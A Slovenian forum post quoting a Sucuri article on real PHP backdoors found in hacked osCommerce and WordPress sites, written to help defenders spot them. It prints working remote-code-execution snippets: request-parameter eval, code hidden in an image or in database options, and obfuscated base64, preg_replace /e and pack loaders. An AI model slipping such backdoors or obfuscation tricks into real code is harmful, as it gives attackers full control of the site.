Nekaj primerov backdoorov v php skripti
1 naročnik
1 naročnik
Securi.net je objavil primere aktualnih PHP backdoorov, od katerih na nekatere (vsaj jaz) pri pregledu skripte nikoli ne bi bil pozoren ;(
"On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that’s likely not to find everything (and your site will just get reinfected).
For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:
if (isset($REQUEST[\'asc\'])) eval(stripslashes($REQUEST[\'asc\']));
Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.
What about this one:
wpthemeicon=createfunction(”,filegetcontents(‘/path/wp-content/themes/themename/images/void.jpg’));$wptheme_icon();
What you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean, by being hard to detect and search for?
Fun Quiz: Find the backdoor?
Since backdoors can be in any type or shape, let’s look at some examples:
The “Filesman” backdoor, big, complex and easy to find:
$authpass = “63a9f0ea7bb98050796b649e85481845″;
$color = “#df5″;
$defaultaction = “SQL”;
$defaultcharset = “Windows-1251″;
$protectionoffer = “ficken”;
pregreplace(“/.*/e”,”\x65\x76\x61\x6C.. hundreds more lines..
Another simple backdoor, executing any code from the “php” request:
eval (base64decode($POST["php"]));
A WordPress-based backdoor. This time, the bad content is hidden inside the database (wp-options tables)
return @eval(get_option(\’blogopt1\’));
A messy backdoor we are seeing in the latest timthumb.php attacks. On this case, all the variables are completely random per case and per file:
function aknhtkmml3($ur5){$dtuq=’$u’;$pnt=’e6′;$p5zy=’r';$xcl4=’e(‘;$feuh=’od’;$qjka=’dec’;$rhi=’$u’;
$m=’as’;$xcew=’);’;$iw=’_';$jutx=’5=b’;$fwiw=’4′;$zqi=’r';$pwrb=’5′;
eval($rhi.$p5zy.$jutx.$m.$pnt.$fwiw.$iw.$qjka.$feuh.$xcl4.$dtuq.$zqi.$pwrb…
return $ur5;}$sk25=’M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…
Another messy one. Do you know how the code is executed there? Preg_replace with the “e” modifier actually acts like an “eval”:
$lllllll=’lllllllll’;
$llllll=”/^.$/e”;
$llllllll=’ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack(‘H’, ’406576616c286261736536345f6465636f646528′).’\$llllllll))’;
preg_replace($llllll, $lllllllll, $lllllll);
Searching for base64_decode? Well, what happens when the attackers do this:
<?php $XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb
=’b’.$XZKsyG.$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY…
And those are just some simple examples…"